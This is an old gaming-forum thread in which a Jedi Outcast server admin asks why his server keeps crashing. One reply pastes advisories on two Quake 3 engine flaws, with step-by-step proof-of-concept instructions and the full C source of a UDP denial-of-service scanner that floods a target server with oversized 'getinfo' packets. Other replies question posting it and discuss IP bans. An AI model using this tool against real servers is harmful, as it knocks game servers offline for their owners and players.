lfnetwork.com mark read register faq members calendar

Thread: Someone crashes my server.
Thread Tools Display Modes
Post a new thread. Add a reply to this thread. Indicate all threads in this forum as read. Subscribe to this forum. RSS feed: this forum RSS feed: all forums
Old 02-21-2006, 03:38 PM   #1
Chris Y
Rookie
 
Chris Y's Avatar
 
Join Date: Nov 2004
Location: Sweden
Posts: 23
Unhappy Someone crashes my server.

Hello there.

I need to know how to prevent someone from crashing my server. I am using dedicated server version 1.02c so I am safe from the "Darkside" crash program. But some funny guy joins my server and announces clearly "Hiya I'm crashing this now. K thnx Bye." The next seconds I have recieved the default Windows Error Pop Up, and my server is crashed.

Anyone know what he did?

[update: He doesn't even need to be on the server while doing it either! ]

Last edited by Chris Y; 02-21-2006 at 06:20 PM.
Chris Y is offline   you may: quote & reply,
Old 02-22-2006, 05:03 PM   #2
Kurgan
Headhunter
 
Kurgan's Avatar
 
Join Date: Nov 1997
Location: The Dawn of Time
Posts: 18,329
LFN Staff Member 10 year veteran! 
Perhaps this exploit was fixed in 1.04 server?


Download JK2 maps for JA Server|BOOT CAMP!|Strategic Academy|
(JA Server: 108.178.55.189:29070)


"The Concussion Rifle is the weapon of a Jedi Knight Player, an elegant weapon, from a more civilized community." - Kyle Katarn
Kurgan is offline   you may: quote & reply,
Old 02-23-2006, 04:54 AM   #3
Chris Y
Rookie
 
Chris Y's Avatar
 
Join Date: Nov 2004
Location: Sweden
Posts: 23
It says in the 1.03c dedicated server readme that they fixed a numerous of exploits. Can't find the 1.04 but I guess they fixed some stuff there too. But is there any other ways than upgrading the game? Many of the JK2 1.02 servers is always up and running.
Chris Y is offline   you may: quote & reply,
Old 03-07-2006, 03:07 PM   #4
Teluride
Rookie
 
Join Date: Feb 2006
Posts: 18
I believe I know what he did. 1.04 also does not fix that problem if it's an out of server crash so I don't see how upgrading will help.
Teluride is offline   you may: quote & reply,
Old 03-07-2006, 09:58 PM   #5
dtriniman
Rookie
 
dtriniman's Avatar
 
Join Date: Feb 2006
Location: Trinidad
Posts: 201
He should upgrade to 1.04 anyway to prevent lots of other problems. Anyway the sad thing is JO runs in the Quake 3 engine and for those that don't know Q3E = wet pu**y to hackers. Here's what you will most likely encounter:

Quake 3 Engine Buffer Overflow

Summary
The Quake 3 engine "is the well known game engine developed by ID Software and is used by many games".

Details
Vulnerable Systems:
* Call of Duty version 1.5 and prior
* Call of Duty: United Offensive version 1.5.1 and prior
* Return to Castle Wolfenstein version 1.41 and prior
* Soldier of Fortune II: Double Helix version 1.03 and prior
* Star Wars Jedi Knight II: Jedi Outcast version 1.04 and prior
* Star Wars Jedi Knight: Jedi Academy version 1.0.1.0 and prior
* Wolfenstein: Enemy Territory version 2.56 and prior
* Other games may be vulnerable as well

The problem is how the engine handles commands longer than 1022 characters, in fact they are automatically truncated at that size and the rest of the characters are handled as network data causing the engine to get confused.

If an attacker joins a server and sends a too big message any client in the server will automatically disconnect showing the "CL_ParseServerMessage: Illegible server message" error.

Proof of Concept
* Download the following file: http://aluigi.altervista.org/poc/q3msgboom.cfg.
* Place it in the base folder of your game (like baseq3, etmain, main, base and so on).
* Start a client and a server or, if possible, more clients to test better the effects of the bug.
* Join the server.
* Go into the console of a client (~ key or shift + ~).
* Type: /exec q3msgboom.
* Any client in the server will disconnect immediately.

If nothing happens or the vsay command is not supported, modify the q3msgboom.cfg file using other commands like say or vsay_team.
Jedi Knight II needs that the script is executed some times before seeing the effects.

Vendor Status
Currently only Enemy Territory 2.60 has been fixed.



Quake 3 Infostring DoS

Summary
The Quake 3 engine is "a well known game engine developed by ID Software". Due to programming bug in the Quake 3 engine, a remote attacker can cause the engine to crash by sending a malformed infostring request.

Details
Vulnerable Systems:
* Call of Duty version 1.5 and prior
* Call of Duty: United Offensive version 1.51 and prior
* Heavy Metal: F.A.K.K.2 version 1.02 and prior
* Quake III Arena version 1.32 and prior
* Return to Castle Wolfenstein version 1.41 and prior
* Soldier of Fortune II: Double Helix version 1.03 and prior
* Star Trek Voyager: Elite Force version 1.20 and prior
* Star Trek: Elite Force II version 1.10 and prior
* Star Wars Jedi Knight II: Jedi Outcast version 1.04 and prior
* Star Wars Jedi Knight: Jedi Academy version 1.011 and prior
* Wolfenstein: Enemy Territory version 1.02 / 2.56 and prior

The Quake 3 engine has problems handling big queries, allowing an attacker to shutdown any game server based on this engine:
ERROR: Info_SetValueForKey: oversize infostring

In some of the vulnerable games it is also possible to crash the server.


Exploit:
/*

by Luigi Auriemma - http://aluigi.altervista.org/poc/q3infoboom.zip

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#endif

#define VER "0.1.1"
#define BUFFSZ 2048
#define TIMEOUT 2
#define MAXRETRY 3
#define INFO "\xff\xff\xff\xff" "getstatus\n"
#define GETINFO "\xff\xff\xff\xff" "getinfo "
#define GETINFOSZ (sizeof(GETINFO) - 1)

#define SEND(x,y) if(sendto(sd, x, y, 0, (struct sockaddr *)&peer, sizeof(peer)) \
< 0) std_err();
#define RECV len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL); \
if(len < 0) std_err();
#define RECVT if(timeout(sd) < 0) { \
fputs("\nError: socket timeout, no reply received\n\n", stdout); \
exit(1); \
} \
RECV;

void showinfo(u_char *data);
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);

int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
i,
len,
slen,
from = 750,
to = BUFFSZ - GETINFOSZ,
jumps = 1,
sent = 0,
retry = 0;
u_short port;
u_char bof[BUFFSZ + 1],
buff[BUFFSZ + 1],
*p;

setbuf(stdout, NULL);

fputs("\n"
"Quake 3 engine infostring crash/shutdown scanner "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@altervista.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);

if(argc < 3) {
printf("\n"
"Usage: %s [options] <server> <port>\n"
"\n"
"Options:\n"
"-f FROM start the scan from byte FROM (default %d)\n"
"-t TO finish the scan at byte TO (default %d)\n"
"-j JUMPS the number of bytes to increment for each scan.\n"
" Default value is %d, meaning that if the scan starts from %d it will\n"
" send getinfo followed by %d bytes, then %d, %d, %d and so on\n"
" until %d\n"
"\n", argv[0],
from,
to,
jumps, from,
from, from + jumps, from + (jumps * 2), from + (jumps * 3), to);
exit(1);
}

#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

argc -= 2;
for(i = 1; i < argc; i++) {
switch(argv[i][1]) {
case 'f': from = atoi(argv[++i]); break;
case 't': to = atoi(argv[++i]); break;
case 'j': jumps = atoi(argv[++i]); break;
default: {
printf("\nError: wrong command-line argument (%s)\n\n", argv[i]);
exit(1);
}
}
}

port = atoi(argv[argc + 1]);
peer.sin_addr.s_addr = resolv(argv[argc]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;

printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);

sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();

fputs("- request informations:\n", stdout);
SEND(INFO, sizeof(INFO) - 1);
RECVT;
buff[len] = 0x00;
showinfo(buff);

fputs("- getinfo crash/shutdown scan:\n\n", stdout);
memcpy(bof, GETINFO, GETINFOSZ);
p = bof + GETINFOSZ;

if(from > to) from = to;
for(i = 0; i < from; i++) *p++ = 'a';
slen = p - bof;

for(; {
printf(" packet length: %d\r", slen);

SEND(bof, slen);
sent++;
if(timeout(sd) < 0) {
if(retry == MAXRETRY) break;
printf(" timeout: retry other %d times\n", MAXRETRY - retry);
retry++;
continue;
}
retry = 0;
RECV;

slen += jumps;
if((slen - GETINFOSZ) > to) {
slen -= jumps;
break;
} else if(slen > BUFFSZ) {
printf("\n\n- max local buffer size (%d) reached", BUFFSZ);
slen -= jumps;
break;
}
for(i = 0; i < jumps; i++) *p++ = 'a';
}

if(!sent) {
fputs("\n\nError: recheck your options because I have sent no packets, probably you have chosen too big values\n\n", stdout);
close(sd);
exit(1);
}

printf("\n\n- last UDP packet sent was %d bytes (jumps = %d)",
slen, slen - GETINFOSZ);

fputs("\n- check server:\n", stdout);
SEND(INFO, sizeof(INFO) - 1);
if(timeout(sd) < 0) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer doesn't seem vulnerable\n\n", stdout);
}
close(sd);
return(0);
}

void showinfo(u_char *data) {
int nt = 1;
u_char *p;

while((p = strchr(data, '\\'))) {
*p = 0x00;
if(!nt) {
printf("%30s: ", data);
nt++;
} else {
printf("%s\n", data);
nt = 0;
}
data = p + 1;
}
printf("%s\n", data);
}

int timeout(int sock) {
struct timeval tout;
fd_set fd_read;
int err;

tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}

u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;

host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)hp->h_addr;
}
return(host_ip);
}

#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif


dtriniman is offline   you may: quote & reply,
Old 03-13-2006, 03:10 AM   #6
Good Sir Knight
Junior Member
 
Good Sir Knight's Avatar
 
Join Date: Dec 2005
Location: US
Posts: 285
thanks

Thanks for that dtriniman : )


If I were you, I'd scan for trojans as well. I only say that becuase he can scan a range of IP addresses (server list) and the guy can shut down your server without joining...(implying it could be a trojan)


It's an outside chance but that stuff is pretty prevalent...
Good Sir Knight is offline   you may: quote & reply,
Old 03-13-2006, 03:29 PM   #7
Teluride
Rookie
 
Join Date: Feb 2006
Posts: 18
It's just a bug in q3 games, not a virus or anything like that...
Teluride is offline   you may: quote & reply,
Old 03-14-2006, 10:57 PM   #8
Good Sir Knight
Junior Member
 
Good Sir Knight's Avatar
 
Join Date: Dec 2005
Location: US
Posts: 285
Quote:
Originally Posted by Teluride
It's just a bug in q3 games, not a virus or anything like that...
Really? So sure are we...are you saying it's impossible? heh



Oh and yes it's all out there already, besides a noob wouldn't know what to do anyway. Any body that could do anything probably already would have done it years ago.
Good Sir Knight is offline   you may: quote & reply,
Old 03-13-2006, 04:36 PM   #9
dtriniman
Rookie
 
dtriniman's Avatar
 
Join Date: Feb 2006
Location: Trinidad
Posts: 201
It's not the game, it;s the engine.


dtriniman is offline   you may: quote & reply,
Old 03-13-2006, 06:04 PM   #10
Lathain Valtiel
Ex-Angel
 
Lathain Valtiel's Avatar
 
Join Date: Jul 2002
Posts: 929
LFN Staff Member 
Umm... Why'd you actually POST those? For anyone to see and use?


Kurgan's Meatgrinder (JA Server: 72.5.248.212:29070)

Player tested, Valtiel approved.

Valtiel approved downloads for Meatgrinder: http://strategy.jediknight.net/jka/downloads.shtml
Lathain Valtiel is offline   you may: quote & reply,
Old 03-13-2006, 08:42 PM   #11
dtriniman
Rookie
 
dtriniman's Avatar
 
Join Date: Feb 2006
Location: Trinidad
Posts: 201
ummmmmm they are on the net already.


dtriniman is offline   you may: quote & reply,
Old 03-17-2006, 12:44 PM   #12
Teluride
Rookie
 
Join Date: Feb 2006
Posts: 18
This particular exploit is a game bug and nothing more. After renting a very well known server for years I know. It's not a 1337 h4z0r worm etc though perhaps its more fun and or romantic thinking that it is.
Teluride is offline   you may: quote & reply,
Old 03-21-2006, 10:19 PM   #13
Good Sir Knight
Junior Member
 
Good Sir Knight's Avatar
 
Join Date: Dec 2005
Location: US
Posts: 285
In your rush to correct everyone you missed the fact that I said that it was an outside chance.

Oh and you don't need to be h4xed to get a worm, you only need to visit the wrong web page. Not very romantic..though the subject matter of the website may be. : )
Good Sir Knight is offline   you may: quote & reply,
Old 03-27-2006, 02:45 AM   #14
Teluride
Rookie
 
Join Date: Feb 2006
Posts: 18
Indeed an outside chance.
Teluride is offline   you may: quote & reply,
Old 04-07-2006, 10:36 PM   #15
Chris Y
Rookie
 
Chris Y's Avatar
 
Join Date: Nov 2004
Location: Sweden
Posts: 23
Thanks for all the replies people! Too bad there's no solution to the problem though.
Oh well... C'est la vie...
Chris Y is offline   you may: quote & reply,
Old 04-07-2006, 10:45 PM   #16
Samnmax221
I never Kipled
 
Samnmax221's Avatar
 
Join Date: Jul 2003
Location: My hovercraft is full of eels
Posts: 5,784
Current Game: Sex with women
Forum Veteran LF Jester 
If they logged in don't you have their IP address?
Samnmax221 is offline   you may: quote & reply,
Old 04-08-2006, 07:13 PM   #17
Chris Y
Rookie
 
Chris Y's Avatar
 
Join Date: Nov 2004
Location: Sweden
Posts: 23
Yes, but many of them who are banned just keeps coming back anyway. The filter is on and I'm sure they get banned.

/g_filterban 1
/addip **********

Then I just kick them. But after a half an hour or a day the same IP returns to the server like nothing. =|
Chris Y is offline   you may: quote & reply,
Old 04-08-2006, 08:21 PM   #18
Samnmax221
I never Kipled
 
Samnmax221's Avatar
 
Join Date: Jul 2003
Location: My hovercraft is full of eels
Posts: 5,784
Current Game: Sex with women
Forum Veteran LF Jester 
What agency in Sweden has jurisdiction over the internet?
Samnmax221 is offline   you may: quote & reply,
Old 04-09-2006, 12:09 AM   #19
Chris Y
Rookie
 
Chris Y's Avatar
 
Join Date: Nov 2004
Location: Sweden
Posts: 23
I have no idea... if I find out, should I report the IP:s to that agency?
Chris Y is offline   you may: quote & reply,
Old 04-09-2006, 12:23 AM   #20
Samnmax221
I never Kipled
 
Samnmax221's Avatar
 
Join Date: Jul 2003
Location: My hovercraft is full of eels
Posts: 5,784
Current Game: Sex with women
Forum Veteran LF Jester 
Oh yah, in the US fines for this sort of thing would run pretty high and they could be looking at prison time
Samnmax221 is offline   you may: quote & reply,
Old 04-09-2006, 02:08 AM   #21
Det. Bart Lasiter
obama.png
 
Det. Bart Lasiter's Avatar
 
Join Date: Mar 2005
Location: `(.)~
Posts: 7,997
Current Game: all
Forum Veteran LF Jester 
Quote:
Originally Posted by Samnmax221
Oh yah, in the US fines for this sort of thing would run pretty high and they could be looking at prison time
I'd bet money it's not their real IP.

Short of fixing the Q3 bug that dtriniman mentioned, the best way to solve the problem may be to change your server's IP address. If you have a high-speed connection your computer's IP is changed (depending on the ISP) every month, with a dial-up connection it's different everytime you connect. Perhaps they couldn't find your server then (I don't play MP so I have no idea how one would locate a server)?

Also, alert them to the fact that it's "kthxbai" or "kthnxbai"



"No, Mama. You can bet your sweet ass and half a titty whoever put that hit on you already got the cops in their back pocket." ~Black Dynamite
Det. Bart Lasiter is offline   you may: quote & reply,
Old 04-09-2006, 09:40 AM   #22
Chris Y
Rookie
 
Chris Y's Avatar
 
Join Date: Nov 2004
Location: Sweden
Posts: 23
I got a new IP now. But my server is quite easy to find, and I think the player has a grudge against me or something.

Still trying to find out about the agency...

But won't I need some good evidence to back it up with? Like a screenshot would be easy, but that can't be enough, can it? :S

(edit: Nice avatar btw, jmac7142 )
Chris Y is offline   you may: quote & reply,
Post a new thread. Add a reply to this thread. Indicate all threads in this forum as read. Subscribe to this forum. RSS feed: this forum RSS feed: all forums
Go Back   LucasForums > Network > JediKnight Series > Game Discussion > Jedi Outcast > Someone crashes my server.

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT -4. The time now is 10:35 AM.

LFNetwork, LLC ©2002-2011 - All rights reserved.
Powered by vBulletin®
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.